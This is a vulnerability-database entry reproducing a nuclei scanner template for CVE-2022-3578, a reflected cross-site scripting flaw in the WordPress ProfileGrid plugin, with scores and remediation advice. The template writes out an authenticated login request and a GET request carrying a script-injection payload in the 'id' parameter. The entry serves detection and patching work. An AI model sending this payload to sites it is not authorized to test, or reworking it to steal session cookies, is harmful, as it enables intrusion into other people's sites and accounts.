Lucene search
K

WordPress ProfileGrid <5.1.1 - Cross-Site Scripting

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

WordPress ProfileGrid <5.1.1 - Cross-Site Scripting. Plugin does not sanitize and escape a parameter before outputting, allowing arbitrary script injection

Related
Refs
Code
id: CVE-2022-3578

info:
  name: WordPress ProfileGrid <5.1.1 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345
    - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3578
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3578
    cwe-id: CWE-79
    epss-score: 0.00946
    epss-percentile: 0.56763
    cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: metagauss
    product: profilegrid
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=pm_add_group&id="><script>alert%28document.domain%29<%2Fscript> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header_2, "text/html")'
          - 'status_code_2 == 200'
          - 'contains(body_2, "Extension Options")'
          - 'contains(body_2, "<script>alert(document.domain)</script>&tab")'
        condition: and
# digest: 4b0a00483046022100fd07827f62501b156784df10fde12b1e1c7a63a212c545e10e7ca95640f64c00022100a6694b933a8e4c6d1a27422f015126d20fa02b5a94485d8a9ea2f7799cca6d04:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.00946
SSVC
23